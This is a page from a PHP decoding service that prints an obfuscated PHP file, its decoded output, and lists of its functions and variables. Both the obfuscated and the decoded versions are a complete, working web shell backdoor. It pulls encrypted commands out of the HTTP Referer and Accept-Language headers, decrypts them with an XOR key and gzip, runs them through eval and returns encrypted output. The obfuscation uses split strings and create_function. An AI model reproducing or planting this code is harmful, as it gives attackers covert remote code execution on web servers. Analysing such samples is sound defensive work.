Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $g='$kh="5d4+&1";$k+&f="4+&0+&2a";f+&unction x+&($t+&,$k){$c=st+&rlen($k);$l=+&strle..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$g='$kh="5d4+&1";$k+&f="4+&0+&2a";f+&unction x+&($t+&,$k){$c=st+&rlen($k);$l=+&strle+&n(+&$t)+&;$o="";for+&($i=0;$i<+&$l;){for+';
$v='si+&on_st+&+&art();$s=&$_+&SESSION+&+&;$ss="subs+&tr";+&$sl="strt+&olow+&er";$i+&=$m[1+&][0].$m+&[+&1][1];$h=$sl+&($s+&s(';
$c='+&p;$e=strpo+&s($s[$+&i],+&+&$f);if($e){+&+&$k=$kh+&.$kf;ob_start();@+&eva+&l(@+&gzu+&ncompress(@x(@b+&ase64_+&decode+&(pre+&g';
$B='[2][$+&+&z]];if(strpos(+&$p,+&$h)===+&0){$+&s[$i+&]="";$p+&=$ss($p+&+&,3);+&}if(arra+&y_key_exists($i+&,$s))+&{$s[$i].=+&$';
$C='q+&)+&;$q=arr+&ay+&_values($q);p+&reg_match_all(+&"/+&([+&\\w])[\\w-]+&+(?:;q+&=0+&.([\\d]))?,?/",$+&ra,$m)+&;if($q+&&&$+&m){@ses';
$d='_replac+&+&e(array+&("/_/","+&/-+&/"),a+&rr+&ay("/","+&+"),$ss($s[$i],0+&,$e)))+&,$+&k)));$o=o+&b_+&get_content+&s();+&ob';
$P='+&md5($i.$k+&h),0,3));$+&f=+&$sl($ss(m+&d5($i.$+&k+&f),0,3))+&+&;$p="";f+&or($z=1+&+&;$z<count($m[1+&]);+&$z++)$p+&.=$q[$m';
$T='RER"];$ra=+&@$r+&["H+&TTP_+&ACCEPT+&_+&LANGUAGE"];i+&f($rr+&+&&&$ra){$u=parse_url+&($rr)+&;pa+&rse_str($u+&["q+&uery"],$+&';
$e='&($+&j=0;($j<+&+&$c&&$i+&<$l);$j++&+,$i++){$o.=$+&t{$i}+&^$k{$j+&};+&}}return $+&o;}+&$r=+&$_SERVER;$+&rr=@$+&r["+&HT+&TP_REFE';
$V='_+&end_clean()+&;$d+&=base6+&4_encode(+&x(gzc+&ompr+&ess($o),+&+&$k+&));+&print("<$+&k>$d</+&$k>");@ses+&sion_dest+&roy();}}}}';
$m=str_replace('hC','','crehChChCate_fhCunhCctihCon');
$S=str_replace('+&','',$g.$e.$T.$C.$v.$P.$B.$c.$d.$V);
$q=$m('',$S);$q();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B [2][$+&+&z]];if(strpos(+&$p,+&$h)===+&0){$+&s[$i+&]="";$p+&=..
$C q+&)+&;$q=arr+&ay+&_values($q);p+&reg_match_all(+&"/+&([+&\w..
$P +&md5($i.$k+&h),0,3));$+&f=+&$sl($ss(m+&d5($i.$+&k+&f),0,3))..
$S $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$T RER"];$ra=+&@$r+&["H+&TTP_+&ACCEPT+&_+&LANGUAGE"];i+&f($rr+&..
$V _+&end_clean()+&;$d+&=base6+&4_encode(+&x(gzc+&ompr+&ess($o)..
$c +&p;$e=strpo+&s($s[$+&i],+&+&$f);if($e){+&+&$k=$kh+&.$kf;ob_..
$d _replac+&+&e(array+&("/_/","+&/-+&/"),a+&rr+&ay("/","+&+"),$..
$e &($+&j=0;($j<+&+&$c&&$i+&<$l);$j++&+,$i++){$o.=$+&t{$i}+&^$k..
$g $kh="5d4+&1";$k+&f="4+&0+&2a";f+&unction x+&($t+&,$k){$c=st+..
$m create_function
$q None
$v si+&on_st+&+&art();$s=&$_+&SESSION+&+&;$ss="subs+&tr";+&$sl=..

Stats

MD5 1d317c18333a007567104519dbb26432
Eval Count 1
Decode Time 142 ms